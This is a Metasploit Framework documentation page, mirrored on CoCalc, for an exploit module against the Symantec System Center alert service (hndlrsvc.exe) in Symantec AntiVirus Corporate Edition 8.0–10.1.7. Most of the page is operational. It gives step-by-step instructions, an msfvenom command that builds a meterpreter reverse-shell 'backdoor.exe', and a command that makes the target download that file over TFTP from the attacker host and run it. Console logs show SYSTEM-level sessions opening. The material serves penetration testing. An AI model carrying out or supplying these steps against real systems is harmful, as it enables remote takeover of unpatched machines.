CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/antivirus/ams_hndlrsvc.md
Views: 1904

Vulnerable Application

This module exploits Symantec System Center's alert management system (hndlrsvc.exe) with an arbitrary command execution. The payload is uploaded via TFTP and then executed on the system. This is part of Symantec AntiVirus Corporate Edition 8.0-10.1.7

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use exploit/windows/antivirus/ams_hndlrsvc

  4. Do: set rhost

  5. Do: exploit

  6. You should get a shell.

Options

CMD

Optional command line to run instead of attempting to directly inject a payload

RPORT

The port the service is running on. Default is 38292.

Scenarios

Manual Upload and Execute

If the module doesn't work for a shell, it's possible to run the CMD twice to emulate the steps the module takes.

  1. start atftpd: atftpd --daemon --port=69 /tftpboot/

  2. create payload: msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 lport=4444 -f exe -o /tftpboot/backdoor.exe

  3. start metasploit

  4. start a multihandler

  5. load the module: use exploit/windows/antivirus/ams_hndlrsvc

  6. use ams: set CMD 'tftp -i 1.1.1.1 GET backdoor.exe'

  7. run

  8. use ams: set cmd 'backdoor.exe'

  9. run

root@kali:~/metasploit-framework# ./msfconsole 

msf > ifconfig
[*] exec: ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
      inet 1.1.1.1  netmask 255.255.255.0  broadcast 192.168.3.255
      inet6 fe80::20c:29ff:fef9:62a1  prefixlen 64  scopeid 0x20<link>
      ether 00:0c:29:f9:1f:a1  txqueuelen 1000  (Ethernet)
      RX packets 70933  bytes 39287343 (37.4 MiB)
      RX errors 0  dropped 0  overruns 0  frame 0
      TX packets 11688  bytes 3788654 (3.6 MiB)
      TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

msf > use exploit/multi/handler 
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Starting the payload handler...
msf exploit(handler) > use exploit/windows/antivirus/ams_hndlrsvc 
msf exploit(ams_hndlrsvc) > set rhost 2.2.2.2
rhost => 2.2.2.2
msf exploit(ams_hndlrsvc) > set lport 9999
lport => 9999
msf exploit(ams_hndlrsvc) > set cmd 'tftp -i 1.1.1.1 GET backdoor.exe'
CMD => tftp -i 1.1.1.1 GET backdoor.exe
msf exploit(ams_hndlrsvc) > run

[*] Started reverse TCP handler on 1.1.1.1:9999 
[*] 2.2.2.2:38292 - Executing command 'tftp -i 1.1.1.1 GET backdoor.exe'
[*] Exploit completed, but no session was created.
msf exploit(ams_hndlrsvc) > set cmd 'backdoor.exe'
cmd => backdoor.exe
msf exploit(ams_hndlrsvc) > run

[*] Started reverse TCP handler on 1.1.1.1:9999 
[*] 2.2.2.2:38292 - Executing command 'backdoor.exe'
[*] Sending stage (957999 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:1038) at 2016-09-30 11:59:13 -0400
[*] Exploit completed, but no session was created.
msf exploit(ams_hndlrsvc) > sessions -l

Active sessions
===============

Id  Type                   Information                 Connection
--  ----                   -----------                 ----------
1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WEBB  1.1.1.1:4444 -> 2.2.2.2:1038 (2.2.2.2)

msf exploit(ams_hndlrsvc) > sessions -v

Active sessions
===============

Session ID: 1
      Type: meterpreter x86/win32
      Info: NT AUTHORITY\SYSTEM @ WEBB
    Tunnel: 1.1.1.1:4444 -> 2.2.2.2:1038 (2.2.2.2)
       Via: exploit/multi/handler
      UUID: 0a85ec1678bc8465/x86=1/windows=1/2016-09-30T15:59:12Z
 MachineID: 8b2889ec93a961f2cc3f2db4620def57
   CheckIn: 28s ago @ 2016-09-30 12:00:15 -0400
Registered: No



msf exploit(ams_hndlrsvc) >

Using Standard Options

msf > use exploit/windows/antivirus/ams_hndlrsvc 
msf exploit(ams_hndlrsvc) > set rhost 2.2.2.2
rhost => 2.2.2.2
msf exploit(ams_hndlrsvc) > set lport 4445
lport => 4445
msf exploit(ams_hndlrsvc) > show options

Module options (exploit/windows/antivirus/ams_hndlrsvc):

 Name   Current Setting  Required  Description
 ----   ---------------  --------  -----------
 CMD                     no        Execute this command instead of using command stager
 LHOST  1.1.1.1     no        The listen IP address from where the victim downloads the payload
 RHOST  2.2.2.2   yes       The target address
 RPORT  38292            yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

 Name      Current Setting  Required  Description
 ----      ---------------  --------  -----------
 EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
 LHOST     1.1.1.1     yes       The listen address
 LPORT     4445             yes       The listen port


Exploit target:

 Id  Name
 --  ----
 0   Windows Universal


msf exploit(ams_hndlrsvc) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4445 
[*] 2.2.2.2:38292 - Sending request to 2.2.2.2:38292
[+] 2.2.2.2:38292 - tftp -i 1.1.1.1 GET OQTAVJBVWZH.exe
[*] 2.2.2.2:38292 - Attempting to execute the payload...
[+] 2.2.2.2:38292 - OQTAVJBVWZH.exe
[*] Sending stage (957999 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4445 -> 2.2.2.2:1041) at 2016-09-30 12:13:18 -0400

meterpreter >